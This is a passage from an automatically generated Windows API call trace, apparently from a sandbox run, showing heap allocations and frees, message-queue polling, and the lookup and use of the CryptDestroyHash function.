RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.982] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0082.982] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.982] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0082.982] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36b0 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3728 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36c8 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3860 [0082.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35a8 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3680 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3830 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3788 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0082.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37a0 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37b8 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36f8 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3818 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3848 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3638 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3698 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0082.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0082.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35c0 [0082.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0082.983] PeekMessageW (in: lpMsg=0x144df54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df54) returned 0 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3ab8 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b18 [0082.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a70 [0082.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a70 | out: hHeap=0x1780000) returned 1 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04b8 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b30 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b30 | out: hHeap=0x1780000) returned 1 [0082.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3938 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ea8 [0082.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3938 | out: hHeap=0x1780000) returned 1 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0558 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.986] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0558 | out: hHeap=0x1780000) returned 1 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0082.986] CryptDestroyHash (hHash=0x41ac780) returned 1 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3998 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a88 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3950 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a88 | out: hHeap=0x1780000) returned 1 [0082.986] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a70 [0082.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0082.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3890 [0082.987] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3890 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a58 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b18 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3ab8 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3998 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a70 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.987] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0082.988] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.988] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.988] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a40 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38d8 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0082.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 